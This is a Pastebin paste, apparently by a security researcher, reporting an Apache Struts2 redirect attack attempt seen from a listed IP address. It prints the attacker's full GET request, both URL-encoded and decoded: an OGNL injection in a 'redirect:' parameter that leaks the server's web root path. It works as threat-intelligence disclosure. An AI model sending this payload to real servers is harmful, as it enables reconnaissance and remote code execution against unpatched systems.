Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Apache Struts2 Redirect Attempt
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- *****
- 61.160.195.10
- *****
- Blog on this: http://neonprimetime.blogspot.com/2015/03/apache-struts2-remote-code-execution.html
- *****
- GET /How.do?redirect:$%7B%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()%7D
- *****
- GET /How.do?redirect:${#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#res.setCharacterEncoding("UTF-8"),#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#res.getWriter().print("dir:"),#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),#res.getWriter().flush(),#res.getWriter().close()}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement